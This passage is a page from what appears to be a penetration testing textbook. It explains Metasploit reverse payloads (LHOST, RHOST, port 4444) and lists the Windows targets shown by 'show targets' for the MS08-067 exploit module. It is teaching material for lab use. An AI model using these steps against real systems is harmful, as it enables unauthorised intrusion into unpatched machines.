62
Chapter 5
Notice that when the payload is selected at and the options are dis-
played at , we are presented with some additional options in the payload
section at , such as
LHOST
and
LPORT
. In this example, you could configure
the payload to connect back to the attacker machine on a specific IP address
and port number, called a
reverse payload
. In reverse payloads, the connection
is actually triggered by the target machine and it connects to the attacker.
You might use this technique to circumvent a firewall or NAT installation.
We’ll configure this exploit with both the
LHOST
and
RHOST
options.
LHOST
,
our attacking machine, will connect back from the target machine (
RHOST
) on
the default TCP port (4444).
msf> show targets
Modules often list vulnerable potential targets. For example, because the vul-
nerability targeted by MS08-067 relies on hard-coded memory addresses, the
exploit is specific to operating systems with specific patch levels, language
version, and security implementations (as explained in detail in Chapters 14
and 15). Using the
show targets
command at the
msf MS08-067
prompt displays
a list of 60 exploit targets (with only a portion shown in the following exam-
ple). The success of the exploit will depend on the version of Windows you
are targeting. Sometimes automatic detection will not work and could even
trigger the wrong exploit, which will usually lead to a service crash.
msf exploit(ms08_067_netapi) >
show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
In this example, you can see that the exploit lists Automatic Targeting
as one option. Often, an exploit module will attempt to target the operating
system automatically based on its version and select an exploit based on the
system’s fingerprint. However, it’s often best to try to identify the appropriate
exploit yourself to avoid triggering the wrong exploit or a potentially destruc-
tive one.
NOTE
This particular exploit is temperamental, and it has a tough time determining the oper-
ating system. If you use this exploit, be sure to set the target as the specific operating system
you use in testing on your VM (Windows XP SP2).